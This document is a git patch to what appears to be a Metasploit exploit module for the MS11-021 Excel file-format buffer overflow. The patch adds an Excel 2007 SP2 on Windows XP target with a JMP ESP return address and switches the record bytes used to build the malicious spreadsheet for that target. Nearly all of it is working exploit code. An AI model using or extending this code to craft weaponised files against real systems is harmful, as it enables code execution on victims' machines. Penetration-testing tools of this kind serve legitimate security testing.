From 43a22d3fa0580fc3d4c34c5b55c8b1c908ef9658 Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Sun, 6 Nov 2011 17:33:29 +0000
Subject: [PATCH] Add Office 2007 SP2 target, thanks Juan

git-svn-id: file:///home/svn/framework3/trunk@14171 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/fileformat/ms11_021_xlb_bof.rb    | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
index 8fa73c09ed..78cb0aaa6c 100644
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -55,9 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# JMP ESP in EXCEL (Office 2007)
 					# Win XP SP3 (Vista and 7 will try to repair the file)
-					['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }],
+					['Microsoft Office Excel 2007 on Windows XP',     {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)
+					['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}],    #JMP ESP in excel
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Aug 9 2011",
@@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		record = ''
 		record << "\xa7\x00"                        #record type
 		record << "\x04\x00"                        #record length
-		record << "\xb0\x0f\x0c\x00"                #data
+		if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2
+			record << "\xb0\x0d\x0c\x00"                #data
+		else
+			record << "\xb0\x0f\x0c\x00"                #data
+		end
 
 		# Offset 1564
 		continue_record = ''